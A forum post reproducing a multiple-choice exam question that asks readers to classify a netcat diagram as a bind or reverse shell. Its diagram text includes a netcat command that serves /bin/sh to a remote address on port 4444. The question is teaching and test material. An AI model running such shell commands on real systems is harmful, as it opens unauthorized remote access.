In the diagram below, what technique is being used on the target? Left Right Victim Attacker 192.168.1.1 nc -lvp 4444 Li
Posted: Tue Jul 12, 2022 8:16 am
In the diagram below, what technique is being used on the target? Left Right Victim Attacker 192.168.1.1 nc -lvp 4444 Listening TCP connection port 4444 192.168.1.2 nc 192.168.1.1 4444 -e /bin/sh Connecting ⒸA. A bind shell is created from 192.168.1.2 to 192.168.1.1 OB. A reverse shell is created from 192.168.1.2 to 192.168.1.1 OC A bind shell is created from 192.168.1.1 to 192.168.1.2 O D. A reverse shell is created from 192.168.1.1 to 192.168.1.2